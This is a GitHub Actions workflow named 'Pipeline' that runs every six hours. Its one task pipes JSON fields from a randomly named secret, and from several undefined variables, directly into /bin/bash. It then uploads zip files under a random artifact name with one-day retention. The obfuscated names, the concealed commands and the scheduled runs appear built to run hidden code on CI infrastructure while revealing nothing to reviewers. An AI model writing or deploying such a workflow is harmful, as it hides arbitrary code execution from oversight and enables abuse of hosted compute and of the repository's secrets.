name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '35 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    name: Main task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          taae7604: ${{ secrets.taae7604 }}
        run: |
          printf '%s' "$taae7604" | jq -r .qvl3435 | /bin/bash
          printf '%s' "$lfo6" | jq -r .rpajb3 | /bin/bash
          printf '%s' "$exx3" | jq -r .ex6 | /bin/bash
          printf '%s' "$pz300" | jq -r .kl90821 | /bin/bash
          echo $csoby51 | jq -r .hgprz504 | /bin/bash
          printf '%s' "$ff657" | jq -r .e627 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: YWaFyqKJ
          path: "*.zip"
          retention-days: 1
